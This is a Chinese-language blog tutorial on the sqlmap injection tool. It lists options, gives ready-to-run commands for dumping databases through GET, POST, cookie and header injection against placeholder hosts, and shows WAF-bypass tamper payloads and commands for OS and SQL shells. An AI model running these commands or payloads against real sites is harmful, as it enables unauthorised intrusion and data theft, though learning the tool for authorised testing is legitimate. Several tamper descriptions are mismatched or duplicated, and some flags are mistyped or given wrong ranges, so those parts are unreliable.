sqlmap简介

• sqlmap一款由python编写的sql自动化注入工具，其主要功能是扫描，发现并利用给定的url进行注入，支持检测的数据库有Mysql, Oracle, Postgresql, SQL Server（ MS sql）, MS Access, SQLite等，并采用五种独特的SQL注入技术，分别是：
  联合查询注入；基于报错注入；基于布尔的盲注；基于时间的盲注；堆叠查询注入；

下载链接

• 点击下载 —> sqlmap注入工具

基础使用

常用参数

• Options

    -h				 	展示基础的帮助信息
    -hh           	 	展示更详细的帮助信息
    --version   		 	显示程序的版本号并退出
    -v			 	 	详细等级：0-6(默认1)
  

• Target：必须至少提供其中一个选项来定义目标；

    -u 				 	目标url
    -r				 	从文件中加载http请求
    -g    			 	将Google dork结果作为目标url处理
    -d                 	直接连接数据库
    -l                 	从burp代理日志的解析目标
  

• Request：可用于指定如何连接到目标url；

    -A				 	HTTP用户代理头的值
    -H				 	额外的头 (例如：X-Forwarded-For: 127.0.0.1)
    --forms 				参数自动搜索表单
    --method=    		 	指定HTTP方法 (例如：GET/POST)
    --data=	         	通过POST发送的数据字符串 (例如：id=1)
    --cookie=    		 	HTTP Cookie头的值 (例如：PHPSESSID=a8d127e..)
    --random-agent     	使用随机选择的HTTP用户代理标头值
    --is-dba              检测是否DBA当前用户
    --host=           	HTTP主机头的值
    --referer=  			HTTP引用页头的值
    --headers=			额外的标题 (例如：Accept-Language: fr\nETag: 123)
    --ignore-timeouts   	忽略连接超时
    --proxy=		        使用一个代理连接到目标URL
    --delay=		        每个HTTP请求之间的延迟 (s)
    --timeout=   			超时连接前等待的秒数 (默认值30)
    --hpp               	使用HTTP参数污染的方法
  

• Injection：可用于指定要测试的参数、提供自定义注入有效载荷和可选的篡改脚本；

    -p				    指定测试参数
    --skip=				跳过测试对于给定参数 (s)
    --dbms=				指定DBMS数据库
    --os=	             	指定DBMS操作系统
    --prefix=   			加入payload前缀
    --suffix=     		加入payload后缀
    --tamper=     		使用给定的脚本(s)篡改注入数据
  

• Detectiong：可用于自定义检测阶段；

    --level=              指定测试的等级 (1-5 默认为1)
    --risk=               指定测试的风险 (0-3 默认为1)
    --smart               当有大量检测目标时，只选择基于错误的检测结果
  

• Techniques：可用于调整特定SQL注入技术的测试；

    --technique=			使用SQL注入技术(默认：BEUSTQ)
    
    B：Boolean-based blind (布尔型注入)
    E：Error-based (报错型注入)
    U：Union query-based (可联合查询注入)
    S：Stacked queries (可多语句查询注入)
    T：Time-based blind (基于时间延迟注入)
    Q：Inline queries (嵌套查询注入)
  

• Fingerprint

    -f				    执行一个广泛的DBMS版本指纹
  

• Emuneration：可用于枚举表中包含的后端数据库管理系统信息、结构和数据；

    -a          			检索所有
    --batch				提示时自动输入y
    --current-user     	获取当前用户数据库管理系统
    --current-db        	检索DBMS当前数据库
    --passwords         	列举DBMS用户 password hashes
    --dbs               	列举DBMS数据库
    --tables            	列举DBMS数据库表
    --columns           	列举DBMS数据库表列
    --schema           	Enumerate DBMS schema
    --dump              	转储DBMS数据库表条目
    --dump-all          	转储所有DBMS数据库表条目
    -D DB               	数据库管理系统数据库来列举
    -T TBL                数据库管理系统数据库表(s)列举
    -C COL              	数据库管理系统数据库表列(s)枚举
  

• Brute force： 可用于运行暴力检查；

    --common-tables        暴力破解表 
    --common-colomns       暴力破解列
    --common-files      	暴力破解文件
  

• File system access：可用于访问后端数据库管理系统底层文件系统；

    --file-read=			读取一个文件从文件系统后端数据库管理系统
    --file-write=			写一个本地文件的后端数据库管理系统的文件系统
    --file-dest=			后端DBMS绝对filepath写
  

• Operating system access：可用于访问后端数据库管理系统底层操作系统；

    --os-cmd=      		执行一个操作系统命令
    --os-shell          	提示一个交互式操作系统shell
    --os-pwn            	OOB shell提示,Meterpreter或VNC
    --os-smbrelay      	一个点击提示OOB壳,Meterpreter或VNC
    --os-bof            	存储过程缓冲区溢出exploitation
    --priv-esc          	数据库处理用户特权升级
  

常用注入方式

GET请求

• 查询所有数据库；

python sqlmap.py -u "http://x.x.x.x/?id=1*" --dbs

• 查询指定数据库中所有表；

python sqlmap.py -u "http://x.x.x.x/?id=1*" -D "库名" --tables

• 查询指定表中字段名；

python sqlmap.py -u "http://x.x.x.x/?id=1*" -D "库名" -T "表名" --columns

• 查询指定表中字段值；

python sqlmap.py -u "http://x.x.x.x/?id=1*" -D "库名" -T "表名" -C "字段名" --dump

POST请求

方法一

• 查询所有数据库；（注：需将post数据保存为指定文件，例如：C:\1.txt）

python sqlmap.py -r "保存文件路径" --dbs

• 查询指定数据库中所有表；

python sqlmap.py -r "保存文件路径" -D "库名" --tables

• 查询指定表中字段名；

python sqlmap.py -r "保存文件路径" -D "库名" -T "表名" --columns

• 查询指定表中字段值；

python sqlmap.py -r "保存文件路径" -D "库名" -T "表名" -C "字段名" --dump

方法二

• 查询所有数据库；

python sqlmap.py -u "http://x.x.x.x/" --data=uname=admin&passwd=admin&submit=Submit --dbs

• 查询指定数据库中所有表；

python sqlmap.py -u "http://x.x.x.x/" --data=uname=admin&passwd=admin&submit=Submit -D "库名" --tables

• 查询指定表中字段名；

python sqlmap.py -u "http://x.x.x.x/" --data=uname=admin&passwd=admin&submit=Submit -D "库名" -T "表名" --columns

• 查询指定表中字段值；

python sqlmap.py -u "http://x.x.x.x/" --data=uname=admin&passwd=admin&submit=Submit -D "库名" -T "表名" -C "字段名" --dump

进阶使用

绕过waf

	--identify-waf   		检测是否有WAF

• 使用方法

python sqlmap.py -u "http://x.x.x.x/" --dbs --tamper=xxx.py

大概脚本如下

apostrophemask.py脚本：将引号替换为utf-8，用于过滤单引号
将 1 AND '1'='1 替换为 1 AND %EF%BC%871%EF%BC%87=%EF%BC%871

base64encode.py脚本：替换为base64编码
将 1' AND SLEEP(5)# 替换为 MScgQU5EIFNMRUVQKDUpIw==

space2plus.py脚本：用加号替换空格
将 SELECT id FROM users 替换为 SELECT+id+FROM+users

nonrecursivereplacement.py脚本：作为双重查询语句，用双重语句替代预定义的sql关键字
将 1 UNION SELECT 2-- 替换为 1 UNIOUNIONN SELESELECTCT 2--

space2randomblank.py脚本：将空格替换为其他有效字符
将 SELECT id FROM users 替换为 SELECT%0Did%0DFROM%0Ausers

unionalltounion.py脚本：将union allselect 替换为unionselect
将 -1 UNION ALL SELECT 替换为 -1 UNION SELECT

securesphere.py脚本：追加特定的字符串
将 1 AND 1=1 替换为 1 AND 1=1 and '0having'='0having

multiplespaces.py脚本：围绕sql关键字添加多个空格
将 1 UNION SELECT foobar 替换为 1 UNION SELECT foobar

space2dash.py脚本：将空格替换为–，并添加一个随机字符串和换行符
将 1 AND 9227=9227 替换为 1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227

space2mssqlblank.py脚本：将空格随机替换为其他空格符号(%01，%02，%03，%04，%05，%06，%07，%08，%09，%0B，%0C，%0D，%0E，%0F，%0A)
将 SELECT id FROM users 替换为 SELECT%0Eid%0DFROM%07users

between.py脚本：用NOT BETWEEN 0 AND 替换 >
将 1 AND A > B-- 替换为 1 AND A NOT BETWEEN 0 AND B--

percentage.py脚本：在每个字符前添加一个%
将 SELECT FIELD FROM TABLE 替换为 %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E

sp_password.py脚本：从T-SQL日志的自动迷糊处理的有效载荷中追加sp_password
将 1 AND 9227=9227-- 替换为 1 AND 9227=9227-- sp_password

randomcase.py脚本：随机大小写
将 INSERT 替换为 INseRt

charencode.py脚本：对给定的payload全部字符使用url编码 (不处理已经编码的字符)
将 SELECT FIELD FROM%20TABLE 替换为 %53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45

charunicodeencode.py脚本：用NOT BETWEEN 0 AND 替换 >
将 SELECT FIELD%20FROM TABLE 替换为 %u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045

space2comment.py脚本：将空格替换为 /**/
将 SELECT id FROM users 替换为 SELECT/**/id/**/FROM/**/users

equaltolike.py脚本：将 = 替换为 LIKE
将 SELECT * FROM users WHERE id=1 替换为 SELECT * FROM users WHERE id LIKE 1

randomcomments.py脚本：用 NOT BETWEEN 0 AND 替换 >
将 INSERT 替换为 I/**/N/**/SERT

equaltolike.py脚本：将 > 替换为 GREATEST，绕过对 > 的过滤
将 1 AND A > B 替换为 1 AND GREATEST(A,B+1)=A

ifnull2ifisnull.py脚本：绕过对 IFNULL 的过滤
将 IFNULL(1, 2) 替换为 IF(ISNULL(1),2,1)

modsecurityversioned.py脚本：过滤空格，使用mysql内联注释的方式进行注入
将 1 AND 2>1-- 替换为 1 /*!30874AND 2>1*/--

space2mysqlblank.py脚本：将空格替换为其他空格符号 (%09，%0A，%0C，%0D， %0B)
将 SELECT id FROM users 替换为 SELECT%0Bid%0DFROM%0Cusers

modsecurityzeroversioned.py脚本：使用内联注释方式 (/*!00000*/) 进行注入
将 1 AND 2>1-- 替换为 1 /*!00000AND 2>1*/--

space2mysqldash.py脚本：将空格替换为 – ，并追随一个换行符
将 1 AND 9227=9227 替换为 1--%0AAND--%0A9227=9227

bluecoat.py脚本：在sql语句之后用有效的随机空白字符替换空格符，随后用 LIKE 替换 =
将 SELECT id FROM users where id = 1 替换为 SELECT%09id FROM users where id LIKE 1

versionedkeywords.py脚本：注释绕过
将 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))# 替换为 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#

halfversionedmorekeywords.py脚本：在每个关键字前添加mysql版本注释
将 value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa 替换为 value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa

space2morehash.py脚本：将空格替换为 #，并添加一个随机字符串和换行符
将 1 AND 9227=9227 替换为 1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227

apostrophenullencode.py脚本：用非法双字节 Unicode 字符替换单引号
将 1 AND '1'='1 替换为 1 AND %00%271%00%27=%00%271

appendnullbyte.py脚本：在有效载荷的结束位置加载null字节字符编码
将 1 AND 1=1 替换为 1 AND 1=1%00

chardoubleencode.py脚本：对给定的payload全部字符使用双重url编码 (不处理已经编码的字符)
将 SELECT FIELD FROM%20TABLE 替换为 %2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545

unmagicquotes.py脚本：用一个多字节组合%bf%27和末尾通用注释一起替换空格
将 1' AND 1=1 替换为 1%bf%27 AND 1=1--

–level/–risk

--level参数使用
--level=1		默认请求GET/POST	
--level=2 		进行cookie测试注入
--level=3		进行user-agent或referer测试注入
--level=5		进行host测试注入

--risk参数使用
一共有3个风险等级，风险等级越高，效果可能越准确，也就是说你认为存在几级的危险等级；在不确定的情况下，建议设置为3级；

User-Agent注入

python sqlmap.py -u "http://x.x.x.x/" --user-agent="*" --dbs

Cookie注入

python sqlmap.py -u "http://x.x.x.x/" --cookie="uname=*" --dbs

Referer注入

python sqlmap.py -u "http://x.x.x.x/" --referer="*" --dbs

X-Forwared-For注入

python sqlmap.py -u "http://x.x.x.x/" --date="xxx" --header="X-Forwared-For:xxx" --dbs

高级使用

–is-dba

• 若是管理员权限会显示True，否则为False；

python sqlmap.py -u "http://x.x.x.x/"  --is-dba

–sql-shell

• 用于在 SQL 注入漏洞中获取 shell 权限的命令，它会自动检测注入漏洞并尝试提取数据、枚举数据库和表，最终给出一个类似于交互式控制台的环境，可以在其中执行 SQL 查询语句；

python sqlmap.py -u "http://x.x.x.x/" --sql-shell

–os-shell

• 提示一个交互式操作系统shell，当满足一系列条件之后可利用其写shell；

python sqlmap.py -u "http://x.x.x.x/" --os-shell

以上内容就是sqlmap工具的使用教程，如有还不太理解或有其他想法的小伙伴们都可以私信我或评论区打出来哟，如有写的不好的地方也请大家多多包涵一下，我也会慢慢去改进和提高的，请各位小伙伴多多支持，走之前别忘了点个赞哟😁！

sqlmap小福利

如有需要中文版的小伙伴，请关注微信公众号Joker零安全回复sqlmap_CN即可获取sqlmap中文版小福利哟~~；

以上内容仅供学习参考使用，切勿用于非法用途，切勿用于非法用途，切勿用于非法用途！！！重要的事情说三遍